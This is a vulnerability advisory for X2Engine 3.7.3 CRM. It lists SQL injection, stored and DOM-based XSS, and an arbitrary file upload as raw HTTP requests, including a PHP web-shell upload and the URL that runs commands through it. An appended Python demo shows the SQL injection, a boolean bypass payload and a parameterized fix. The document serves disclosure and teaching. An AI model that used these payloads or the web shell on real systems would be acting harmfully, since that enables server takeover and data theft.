X2Engine 3.7.3 Cross Site Scripting / Shell Upload / SQL Injection

2014.02.28
Credit: HauntIT
Risk: High
Local: No
Remote: Yes
CVE: N/A

# ==============================================================
# Title ...| Multiple vulnerabilities in X2Engine
# Version .| X2Engine 3.7.3
# Date ....| .02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] All of the requests below require a logged-in admin session.

# ==============================================================
# 1. SQL Injection

---<request>---
GET /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/profile/getEvents?lastEventId='mynameissqli&lastTimestamp=0&profileId=1&myProfileId=1 HTTP/1.1
Host: 10.149.14.62
(...)
Connection: close
---<request>---

The single quote in "lastEventId" breaks the query (error-based detection). Parameter "lastTimestamp" is also vulnerable.

# ==============================================================
# 2. XSS (stored, contact fields)

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/contacts/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 917

Contacts%5BfirstName%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&Contacts%5Btitle%5D=tester&Contacts%5Bphone%5D=&Contacts%5Bphone2%5D=&Contacts%5BdoNotCall%5D=0&Contacts%5BlastName%5D=tester&Contacts%5Bcompany_id%5D=&Contacts%5Bcompany%5D=&Contacts%5Bwebsite%5D=&Contacts%5Bemail%5D=&Contacts%5BdoNotEmail%5D=0&Contacts%5Bleadtype%5D=&Contacts%5BleadSource%5D=&Contacts%5Bleadstatus%5D=&Contacts%5BleadDate%5D=&Contacts%5Binterest%5D=&Contacts%5Bdealvalue%5D=%240.00&Contacts%5Bclosedate%5D=&Contacts%5Bdealstatus%5D=&Contacts%5Baddress%5D=&Contacts%5Baddress2%5D=&Contacts%5Bcity%5D=&Contacts%5Bstate%5D=&Contacts%5Bzipcode%5D=&Contacts%5Bcountry%5D=&Contacts%5BbackgroundInfo%5D=&Contacts%5Bskype%5D=&Contacts%5Blinkedin%5D=&Contacts%5Btwitter%5D=&Contacts%5Bfacebook%5D=&Contacts%5Bgoogleplus%5D=&Contacts%5BotherUrl%5D=&Contacts%5BassignedTo%5D=admin&Contacts%5Bpriority%5D=&Contacts%5Bvisibility%5D=1&yt0=Create
---<request>---

The payload in Contacts[firstName] (URL-decoded: '>"><body/onload=alert(9999)>) is stored and rendered unencoded.
Also vulnerable: Contacts%5Bwebsite%5D, Contacts%5Bcompany%5D, Contacts%5Binterest%5D...

# ==============================================================
# 3. Arbitrary File Upload

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--
---<request>---

The file is written under the web root with its original name and extension and is served directly, so the PHP executes. To reach the shell, request:
http://10.149.14.62/(...)/X2Engine-3.7.3/x2engine/uploads/media/admin/mishell.php?cmd=id

# ==============================================================
# 4. DOM-based XSS (CKEditorFuncNum)

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/media/ajaxUpload?CKEditor=input&CKEditorFuncNum='');</script><script>alert(1)</script>&langCode=en HTTP/1.1
Host: 10.149.14.62
(...)
<!-- yes, I know. This is the same request as [3] ;)
Content-Length: 241

-----------------------------20967107015427
Content-Disposition: form-data; name="upload"; filename="mishell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------20967107015427--
---<request>---

The CKEditorFuncNum value is reflected into the script the upload response sends back to the editor; the payload is shaped to close the quoted argument and the script element before injecting its own script.

# ==============================================================
# 5. XSS (stored, document name)

---<request>---
POST /k/cms/x2/X2Engine-3.7.3/x2engine/index.php/docs/create HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 260

Docs%5Bname%5D='%3e"%3e%3cbody%2fonload%3dalert(991212129)%3e&Docs%5Bvisibility%5D=1&yt0=Create&Docs%5Btext%5D=%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%09%3Ctitle%3E%3C%2Ftitle%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3Eaaaaaaaaaaaaaaaa%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A
---<request>---

Same payload as [2], this time in Docs[name].

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
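The defect class behind section 1, as an added example (not X2Engine's code): a constructed in-memory events table, a handler that splices lastEventId and lastTimestamp into the query text, and the hardened handler that enforces the integer type and binds parameters. The table and column names are assumptions for the demo. It shows why the advisory's `'mynameissqli` probe produces a database error, and that the same sink also accepts a boolean payload that ignores the cursor and returns every row, including another user's events.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the activity feed behind profile/getEvents.
    Table and column names are assumptions, not X2Engine's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE x2_events (id INTEGER, timestamp INTEGER, user TEXT, text TEXT)"
    )
    conn.executemany(
        "INSERT INTO x2_events VALUES (?, ?, ?, ?)",
        [
            (1, 1393545600, "admin", "Created contact tester"),
            (2, 1393545660, "admin", "Updated profile"),
            (3, 1393545720, "sales", "Private note: Q1 forecast"),
        ],
    )
    return conn


def get_events_vulnerable(conn, last_event_id, last_timestamp):
    """Request parameters spliced straight into the SQL text."""
    sql = (
        "SELECT id, user, text FROM x2_events "
        f"WHERE id > {last_event_id} AND timestamp > {last_timestamp} ORDER BY id"
    )
    return conn.execute(sql).fetchall()


def get_events_safe(conn, last_event_id, last_timestamp):
    """Hardened: both values are numeric cursors, so enforce the type, then bind."""
    try:
        eid, ts = int(last_event_id), int(last_timestamp)
    except (TypeError, ValueError):
        raise ValueError("lastEventId and lastTimestamp must be integers")
    sql = "SELECT id, user, text FROM x2_events WHERE id > ? AND timestamp > ? ORDER BY id"
    return conn.execute(sql, (eid, ts)).fetchall()


def query_errors(fn, conn, last_event_id, last_timestamp):
    """True if the handler raises: a SQL syntax error on the vulnerable path
    (what the advisory's probe triggers) or the validation error on the safe one."""
    try:
        fn(conn, last_event_id, last_timestamp)
        return False
    except (sqlite3.OperationalError, ValueError):
        return True


def demo():
    conn = make_db()
    probe = "'mynameissqli"   # the advisory's error-based probe (section 1)
    bypass = "2 OR 1=1"       # boolean injection: ORDER BY still runs, cursor is ignored
    return {
        "legit_vulnerable": get_events_vulnerable(conn, "2", "0"),
        "legit_safe": get_events_safe(conn, "2", "0"),
        "probe_breaks_vulnerable": query_errors(get_events_vulnerable, conn, probe, "0"),
        "bypass_rows_vulnerable": len(get_events_vulnerable(conn, bypass, "0")),
        "timestamp_bypass_rows": len(get_events_vulnerable(conn, "2", "0 OR 1=1")),
        "probe_rejected_safe": query_errors(get_events_safe, conn, probe, "0"),
        "bypass_rejected_safe": query_errors(get_events_safe, conn, bypass, "0"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In a Yii-based application such as X2Engine the equivalent of the safe path is a bound parameter in the query builder plus an integer cast on the controller side; the cast matters because a bound `'2 OR 1=1'` is merely harmless, while rejecting it also gives the detection team an error to alert on.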

